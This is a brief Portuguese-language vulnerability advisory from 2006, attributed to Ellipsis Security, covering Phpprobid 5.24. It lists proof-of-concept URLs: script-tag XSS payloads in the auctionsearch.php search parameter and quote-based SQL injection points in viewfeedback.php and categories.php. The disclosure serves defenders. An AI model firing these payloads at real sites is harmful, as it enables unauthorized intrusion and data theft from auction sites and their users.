| Phpprobid Falhas de XSS e SQL injection |
|
|
|
| Por Marcelo Almeida (Vympel) | |
| 27 de July de 2006 | |
|
Phpprobid 5.24
http://www.phpprobid.com
Cross Site Scripting (XSS) http://target.xx/auctionsearch.php?advsrc="<script>alert(/EllipsisSecurityTest/)</script> http://target.xx/auctionsearch.php?start=1&advsrc="><script>alert(/EllipsisSecurityTest/)</script> SQL injection http://target.xx/viewfeedback.php?view=1'[SQL] http://target.xx/viewfeedback.php?view=all&start=1'[SQL] http://target.xx/categories.php?parent=&start=&orderField=itemname&orderType=1'[SQL] Ellipsis Security http://www.ellsec.org |
| < Anterior | Próximo > |
|---|







